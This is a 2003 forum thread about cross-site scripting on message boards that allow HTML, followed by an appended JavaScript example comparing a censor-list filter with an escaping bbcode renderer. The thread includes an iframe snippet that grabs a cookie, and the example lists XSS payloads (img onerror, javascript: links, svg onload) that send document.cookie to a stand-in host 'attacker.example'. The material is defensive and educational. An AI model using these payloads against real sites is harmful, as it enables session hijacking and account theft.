
  #1  
Old 04-15-2003, 03:01 AM
Gutspiller
Join Date: Dec 2001
Posts: 1,046
What is XSS and how can it affect a board with HTML turned on?

Are they certain HTML commands?
  #2  
Old 04-15-2003, 10:10 AM
filburt1
Join Date: Feb 2002
Location: Maryland, US
Posts: 6,144

XSS is cross-site scripting. In a nutshell, it allows people to inject malicious JavaScript that captures the user's cookies (one of which, remember, is the user's hashed password) and redirects them to their own site so they can be brute-force attacked and eventually reverted back to the original password.
  #3  
Old 04-15-2003, 04:50 PM
okrogius
Join Date: Dec 2001
Location: USA
Posts: 264

In addition to that, with some JavaScript you can have arbitrary commands executed when an admin views a page with the malicious code.

i.e. iframe with src pointing to /admin/....?....&username="+getCookie('bbusername')+"
  #4  
Old 04-15-2003, 05:06 PM
filburt1
Join Date: Feb 2002
Location: Maryland, US
Posts: 6,144

I'm not sure if iframes inherit the cookies.
  #5  
Old 04-15-2003, 06:02 PM
Erwin
Join Date: Jan 2002
Posts: 7,604

There is no way of enabling HTML and keeping your site secure.

In any case, there is a thread on vB.com about turning on HTML and keeping it as safe as possible.
  #6  
Old 04-15-2003, 10:50 PM
Gutspiller
Join Date: Dec 2001
Posts: 1,046

Is there a way to block XSS scripts without upgrading? Is the only other way to turn off HTML? If there is a certain command to run XSS scripts, can't you just add that command to your censor list?

I have "<iframe" added to my censor list and nobody can run an iframe, yet they can still run html. Something like this possible?
  #7  
Old 04-15-2003, 10:51 PM
filburt1
Join Date: Feb 2002
Location: Maryland, US
Posts: 6,144

Never, ever enable HTML anywhere on your board. There is no 100% secure way of enabling it and still letting users post in it.
  #8  
Old 04-15-2003, 10:53 PM
Gutspiller
Join Date: Dec 2001
Posts: 1,046

Quote:
Today at 05:51 PM filburt1 said this in Post #6
Never, ever disable HTML anywhere on your board. There is no 100% secure way of enabling it and still letting users post in it.

You mean never ever enable it.

Maybe I could get some help on creating a secure way to run it.
  #9  
Old 04-16-2003, 12:13 PM
Logician
Join Date: Nov 2001
Location: inside vb code
Posts: 4,449

Quote:
Today at 01:53 AM Gutspiller said this in Post #8
You mean never ever enable it.

Maybe I could get some help on creating a secure way to run it.
Why do you need HTML? What feature does it add to your board that you can not have with bbcode?

You can really create a new bbcode for many HTML commands you need in your site and then disable the HTML altogether.

Or another alternative may be enabling it for certain (trusted) usergroups only and disabling for the rest (Check Hack releases forum for this hack).

As filburt1 stated, do not enable it for all if you don't want a site that has serious security gaps.
  #10  
Old 04-16-2003, 05:35 PM
okrogius
Join Date: Dec 2001
Location: USA
Posts: 264

Quote:
Yesterday at 06:53 PM Gutspiller said this in Post #8
You mean never ever enable it.

Maybe I could get some help on creating a secure way to run it.
bbcode is your secure way of running it.
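Added example, not code from this thread or from vBulletin: it puts the two approaches argued over above side by side. Gutspiller's censor-list idea (post #6) is modelled as a substring filter on raw HTML, and the "bbcode is your secure way" answer (posts #9 and #10) is modelled as a renderer that escapes everything and then expands only a small allow-list of tags. The payloads are constructed variants of the cookie-theft and admin-action ideas in posts #2 and #3; the `attacker.example` host, the censor-list matching rules and the three-tag bbcode set are assumptions made for the illustration.

```javascript
// Added example (not from the thread or vBulletin): censor-list blocklist on
// raw HTML versus an allow-list bbcode renderer over escaped text.
// Payloads, hostnames and the bbcode tag set are constructed for illustration.

// Escape the five characters that can open or close markup or attributes.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// The censor-list approach from post #6: replace a banned word such as
// "<iframe" wherever it occurs. Modelled as a case-sensitive substring filter;
// the exact matching rules of the real censor are an assumption here.
function censorListFilter(html, banned = ['<iframe']) {
  let out = html;
  for (const word of banned) out = out.split(word).join('****');
  return out;
}

// Allow-list bbcode renderer: escape first, then expand only known tags.
// [url] accepts http(s) targets only, so a "javascript:" link collapses to its
// label. Everything else stays literal text, never markup.
function renderBbcode(text) {
  let out = escapeHtml(text);
  out = out.replace(/\[b\]([\s\S]*?)\[\/b\]/gi, '<b>$1</b>');
  out = out.replace(/\[i\]([\s\S]*?)\[\/i\]/gi, '<i>$1</i>');
  out = out.replace(/\[url=([^\]]+)\]([\s\S]*?)\[\/url\]/gi, (m, href, label) =>
    /^https?:\/\//i.test(href) ? `<a href="${href}">${label}</a>` : label);
  return out;
}

// Evaluation aid only (not a sanitizer): flags any opening tag the renderer
// would not emit, or one carrying an on*= handler or a javascript: URL.
// Escaped text has no "<" left, so it can never match.
const EMITTED_TAGS = new Set(['b', 'i', 'a']);
function findsActiveMarkup(html) {
  const tag = /<\s*([a-z][a-z0-9]*)([^>]*)>/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const name = m[1].toLowerCase(), attrs = m[2];
    if (!EMITTED_TAGS.has(name)) return true;
    if (/\bon[a-z]+\s*=/i.test(attrs) || /javascript\s*:/i.test(attrs)) return true;
  }
  return false;
}

// Constructed payloads. Only the first contains the banned string exactly; the
// rest are trivial variants of the cookie-theft / admin-action ideas above.
const PAYLOADS = [
  '<iframe src="//attacker.example/"></iframe>',
  '<IFRAME src="//attacker.example/"></IFRAME>',
  '<img src=x onerror="new Image().src=\'//attacker.example/?c=\'+document.cookie">',
  '<a href="javascript:location=\'//attacker.example/?c=\'+document.cookie">click</a>',
  '<svg onload="fetch(\'//attacker.example/?c=\'+document.cookie)">',
];

// Run both approaches over every payload and report what still carries markup.
function compare(payloads = PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    censorListStillActive: findsActiveMarkup(censorListFilter(p)),
    bbcodeStillActive: findsActiveMarkup(renderBbcode(p)),
  }));
}

for (const r of compare()) console.log(r);
console.log(renderBbcode('[b]bold[/b] [url=http://example.com/?a=1&b=2]link[/url]'));
console.log(renderBbcode('[url=javascript:alert(document.cookie)]click[/url]'));
```

Of the five payloads, the censor list neutralises only the first; the upper-case `<IFRAME` slips past a case-sensitive match, and the other three never contain the banned string at all, which is the general problem with enumerating bad input. The bbcode renderer leaves every one of them as inert text because the escaping happens before any tag is recognised, and the only markup it emits is markup it generated itself. The scheme check on `[url]` belongs on any bbcode that takes a URL, `[img]` included, since `javascript:` in a `src` or `href` is the same injection without any angle brackets in the input.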


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.